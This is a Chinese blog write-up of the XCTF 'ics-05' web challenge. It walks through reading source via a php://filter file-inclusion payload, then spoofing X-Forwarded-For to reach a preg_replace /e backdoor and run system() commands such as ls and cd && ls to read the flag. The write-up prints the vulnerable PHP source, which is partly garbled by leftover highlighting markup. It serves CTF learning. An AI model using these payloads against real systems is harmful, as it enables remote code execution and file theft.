XCTF ics-05

最新推荐文章于 2023-05-20 18:46:46 发布
最新推荐文章于 2023-05-20 18:46:46 发布
阅读量578 收藏 1
点赞数 1
分类专栏: 代码审计 preg-replace函数漏洞 文章标签: xctf
原文链接:https://blog.csdn.net/CliffordR/article/details/98472156
版权

题目来源
攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)
1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。
2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码

通过php内置协议直接读取代码
/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

 
 

 
 
  • 1
  • 2

LFI漏洞的黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
此处,因为源码中有提示?page=index,所以读一下index.php中的源码
3.在这里插入图片描述进行base64解密

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);

?>
<!DOCTYPE HTML>
<html>

<head>
<meta charset=utf-8>
<meta name=renderer content=webkit>
<meta http-equiv=X-UA-Compatible content=IE=edge,chrome=1>
<meta name=viewport content=width=device-width, initial-scale=1, maximum-scale=1>
<link rel=stylesheet href=layui/css/layui.css media=all>
<title>设备维护中心</title>
<meta charset=utf-8>
</head>

<body>
<ul class=layui-nav>
<li class=layui-nav-item layui-this><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class=layui-elem-field layui-field-title style=“margin-top: 30px;>
<legend>设备列表</legend>
</fieldset>
<table class=layui-hide id=test></table>
<script type=text/html id=switchTpl>
<! 这里的 checked 的状态只是演示 >
<input type=“checkbox” name=“sex” value="{{d.id}}" lay-skin=“switch” lay-text=“开|关” lay-filter=“checkDemo” {{ d.id==1 0003 ? ‘checked’ : ‘’ }}>
</script>
<script src=layui/layui.js charset=utf-8></script>
<script>
layui.use(‘table’, function() {
var table = layui.table,
form = layui.form;

    table<span class="token punctuation">.</span><span class="token function">render</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
        elem<span class="token punctuation">:</span> <span class="token string">'#test'</span><span class="token punctuation">,</span>
        url<span class="token punctuation">:</span> <span class="token string">'/somrthing.json'</span><span class="token punctuation">,</span>
        cellMinWidth<span class="token punctuation">:</span> <span class="token number">80</span><span class="token punctuation">,</span>
        cols<span class="token punctuation">:</span> <span class="token punctuation">[</span>
            <span class="token punctuation">[</span>
                <span class="token punctuation">{</span> type<span class="token punctuation">:</span> <span class="token string">'numbers'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span>
                 <span class="token punctuation">{</span> type<span class="token punctuation">:</span> <span class="token string">'checkbox'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span>
                 <span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'id'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'ID'</span><span class="token punctuation">,</span> width<span class="token punctuation">:</span> <span class="token number">100</span><span class="token punctuation">,</span> unresize<span class="token punctuation">:</span> <span class="token boolean">true</span><span class="token punctuation">,</span> sort<span class="token punctuation">:</span> <span class="token boolean">true</span> <span class="token punctuation">}</span><span class="token punctuation">,</span>
                 <span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'name'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'设备名'</span><span class="token punctuation">,</span> templet<span class="token punctuation">:</span> <span class="token string">'#nameTpl'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span>
                 <span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'area'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'区域'</span> <span class="token punctuation">}</span><span class="token punctuation">,</span>
                 <span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'status'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'维护状态'</span><span class="token punctuation">,</span> minWidth<span class="token punctuation">:</span> <span class="token number">120</span><span class="token punctuation">,</span> sort<span class="token punctuation">:</span> <span class="token boolean">true</span> <span class="token punctuation">}</span><span class="token punctuation">,</span>
                 <span class="token punctuation">{</span> field<span class="token punctuation">:</span> <span class="token string">'check'</span><span class="token punctuation">,</span> title<span class="token punctuation">:</span> <span class="token string">'设备开关'</span><span class="token punctuation">,</span> width<span class="token punctuation">:</span> <span class="token number">85</span><span class="token punctuation">,</span> templet<span class="token punctuation">:</span> <span class="token string">'#switchTpl'</span><span class="token punctuation">,</span> unresize<span class="token punctuation">:</span> <span class="token boolean">true</span> <span class="token punctuation">}</span>
            <span class="token punctuation">]</span>
        <span class="token punctuation">]</span><span class="token punctuation">,</span>
        page<span class="token punctuation">:</span> <span class="token boolean">true</span>
    <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script language-javascript">
layui<span class="token punctuation">.</span><span class="token function">use</span><span class="token punctuation">(</span><span class="token string">'element'</span><span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> element <span class="token operator">=</span> layui<span class="token punctuation">.</span>element<span class="token punctuation">;</span> <span class="token comment">//导航的hover效果、二级菜单等功能,需要依赖element模块</span>
    <span class="token comment">//监听导航点击</span>
    element<span class="token punctuation">.</span><span class="token function">on</span><span class="token punctuation">(</span><span class="token string">'nav(demo)'</span><span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span>elem<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token comment">//console.log(elem)</span>
        layer<span class="token punctuation">.</span><span class="token function">msg</span><span class="token punctuation">(</span>elem<span class="token punctuation">.</span><span class="token function">text</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>

<?php

$page = $_GET[page];

if (isset($page)) {

if (ctype_alnum($page)) {
?>

<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span><span class="token style-attr language-css"><span class="token attr-name"> <span class="token attr-name">style</span></span><span class="token punctuation">="</span><span class="token attr-value"><span class="token property">text-align</span><span class="token punctuation">:</span>center</span><span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>lead<span class="token punctuation">"</span></span><span class="token punctuation">&gt;</span></span><span class="token prolog">&lt;?php echo $page; die();?&gt;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span>

<?php

}else{

?>
<br /><br /><br /><br />
<div style=“text-align:center>
<p class=lead>
<?php

            if (strpos($page, 'input') &gt; 0) {
                die();
            }

            if (strpos($page, 'ta:text') &gt; 0) {
                die();
            }

            if (strpos($page, 'text') &gt; 0) {
                die();
            }

            if ($page === 'index.php') {
                die('Ok');
            }
                include($page);
                die();
            ?&gt;</span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">/&gt;</span></span>

<?php
}}

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER[‘HTTP_X_FORWARDED_FOR’] === ‘127.0.0.1’) {

echo "&lt;br &gt;Welcome My Admin ! &lt;br &gt;";

$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];

if (isset($pattern) &amp;&amp; isset($replacement) &amp;&amp; isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
}else{
    die();
}

}
?>
</body>
</html>

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83
  • 84
  • 85
  • 86
  • 87
  • 88
  • 89
  • 90
  • 91
  • 92
  • 93
  • 94
  • 95
  • 96
  • 97
  • 98
  • 99
  • 100
  • 101
  • 102
  • 103
  • 104
  • 105
  • 106
  • 107
  • 108
  • 109
  • 110
  • 111
  • 112
  • 113
  • 114
  • 115
  • 116
  • 117
  • 118
  • 119
  • 120
  • 121
  • 122
  • 123
  • 124
  • 125
  • 126
  • 127
  • 128
  • 129
  • 130
  • 131
  • 132
  • 133
  • 134
  • 135
  • 136
  • 137

得到源码后开始审计

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

echo "<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">&gt;</span></span>Welcome My Admin ! <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span> <span class="token punctuation">&gt;</span></span>";

$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];

if (isset($pattern) &amp;&amp; isset($replacement) &amp;&amp; isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
}else{
    die();
}

}

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15

此处存在preg_replace函数,尝试测试是否存在命令注入漏洞
函数作用:搜索subject中匹配pattern的部分, 以replacement进行替换。
此处明显考察的是preg_replace 函数使用 /e 模式,导致代码执行的问题。也就是说,pat值和sub值相同,rep的代码就会执行。
XFF改成127.0.0.1之后,GET进来三个参数。这里调用了preg_replace函数。并且没有对pat进行过滤,所以可以传入"/e"触发漏洞,触发后replacement的语句是会得到执行的,首先执行一下phpinfo
在这里插入图片描述执行成功
然后使用system(“ls”)尝试获取文件目录
在这里插入图片描述使用cd进入目标文件
system(“cd+s3chahahaDir/flag+%26%26+ls”)
为了避免编码问题,此处不能使用空格隔开,而是使用+,%26%26为&&,意思是当前面命令执行成功时,继续执行后面的命令。
在这里插入图片描述最后使用cat命令获取flag.php中的文件
在这里插入图片描述成功获取flag。

总结:

思路建立:
1.由?page=index联想到可能存在文件包含读源码的漏洞,使用/index.php?page=php://filter/read=convert.base64-encode/resource=index.php获取index.php中源码
2.读取源码后,进行代码审计。发现存在preg_replace函数,尝试利用命令执行漏洞,获取到文件目录,最终找到目标文件
3.读取存在flag的文件,得到flag。
主要技能点:
文件包含漏洞
PHP伪协议中的 php://filter
preg_replace函数引发的命令执行漏洞

小 白 渣
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界ics-5wp
T19er的博客
07-10 2829
0x01 ics-5 浏览只有一个index页面,想到down源码,无果。 查看源代码发现有个page参数可以传值,利用LFI来查看源码。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php 读到base64加密的源码 PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNl...
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-ics-05
臭nana的博客
12-09 302
打开题目,根据题目提示找到设备维护中心 点进去(其他点了都没用),没发现什么有用的东西 点击了云平台设备维护中心后,发现url后面多了点东西,页面上也多了点东西,这里就是突破口 随便改一下page后面传入的值,发现后面的东西会被打印在页面上,尝试php伪协议,构造payload如下 page=php://filter/read=convert.base64-encode/r...
XCTF训练之ics-05
RoboTerh的博客
08-05 241
XCTF ics-05 打开题目,我们发现只有“设备维护中心”可以进入 又发现点击“云平台设备维护中心”页面多了indexurl中多了page=index 查看源码,发现没有什么有用的东西 想到通过php伪协议获取index.php的源码不懂PHP伪协议点我!! payload:?php://filter/convert.base64-encode/resource=index.php 得到源码: base64解码后得到关键php代码: <?php error_reporting(0); @s
xctf ics-05 wp
doudoudedi
06-18 2699
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
xctf-ics05
Mars748的博客
11-12 400
xctf里面的一道web题ics05 这道题给了提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 既然说了是设备维护中心的漏洞,打开设备维护中心,什么东西也没有,查看源码也没有啥东西。 这时候瞎点,点到了网页上面的导航上 云平台设备维护中心发现有变化。发现page的值会显示出来。 将page的参数改成index.php发现页面显示ok,改成其他的(比如flag.php)页面啥都没显...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-Mobile】新手练习区-05-easyjni.apk
08-05
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjni
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
xctf(web)-ics-05
i_am_not_hacker的博客
08-08 903
本题的题目描述如下图所示,查看“设备维护中心” 再查看源码,也没有找到线索,通过php伪协议查看源码 php伪协议参考文章 在题目所给的url后加 ?page=php://filter/convert.base64-encode/resource=index.php 即可查到base64加密后的源码 base64解码后,查看代码,发现后门 //方便的实现输入输出的功能,正在开发中的功能,只能内部...
xctf_web ics-05
fly夏天的博客
09-23 561
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问题就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
XCTF web ics-05
H4ppyD0g的博客
09-06 309
preg_replace() 函数执行一个正则表达式的搜索和替换。 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 ...
攻防世界XCTFics-05
末初的CSDN博客
03-06 1284
根据提示来到设备维护中心 查看源码可以发现这里隐藏了个超链接变量传参,看到变量传参,有可能存在文件包含漏洞读取源码,然后这个站又是php的站,那么使用php伪协议读取源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 出现了base64编码过的源码,使用base64解码后源码如下: <?php err...
攻防世界(XCTFics-05 wp
qq_43399979的博客
09-05 409
到处点点看,发现会出现?page参数 因为index参数的存在,怀疑这里存在文件包含漏洞,经过几次尝试之后发现存在任意文件读取漏洞,用filter伪协议爆出了index.php。 page=php://filter/read=convert.base64-encode/resource=index.php 代码如下: <?php error_reporting(0); @sessi...
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)
Onlyone_1314的博客
01-01 2890
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
xctf攻防世界 Web高手进阶区 comment
l8947943的博客
01-06 3328
1. 进入环境,查看内容 跳转到login.php 入手点是想办法登录后,再进行操作。 接下来一顿扫描瞅瞅: 2. 问题分析 想办法先登入进去 我们看到文本框提示已经给了zhangwei,密码是zhangwei***,其实就是三位字符补充,在此我们借助burpsuite进行跑字典,如图: 添加payloads,如图: Start attack!慢慢等吧,巨慢,如图: 发现当***为666时候请求302了,emmm,走起,如图: 利用.git获取源码 想到前面dirsearch出来的内容,根
xctf】comment,git泄露git修复
qq_39167911的博客
03-24 530
dirsearch -u发现git目录,burpsuit的spider爬虫发现login等目录 githacker拿源码 sudo pip3 install GitHacker //创建软连接放到 /usr/bin 或者 /usr/sbin 目录下 cd /usr/sbin sudo ln -s /home/<用户名>/.local/bin/githacker //添加到环境变量中 sudo vi /etc/profile :/home/<用户名>/.loca
ctf-wp-comment
dahege666的博客
12-18 549
Comment是代表去添加一些评论或者注释 描述中说“程序员GIT写一半跑路了,没来得及Commit”,这是很明显的一个提示 git stash恢复: 最常用的就是使用git clone把github上的源码下载下来,在实际上当你把代码提交给github时是分为两个步骤的:一个git add,另一个是git commit。 在git工具里存在一个缓存区stage,当在工作区写完代码后,首先是使用git add,就是把修改后的代码放到了stage缓存区,但是修改之前的代码也是可以找打...
CTF_comment_git库泄露&&二次注入_wp
shelter1234567的博客
05-20 477
git是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。攻击者可以利用该漏洞下载git文件夹里的所有内容,如果文件内有敏感信息比如站点源码、数据库账户密码等,攻击者可能通过收集到信息攻击该服务器........
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值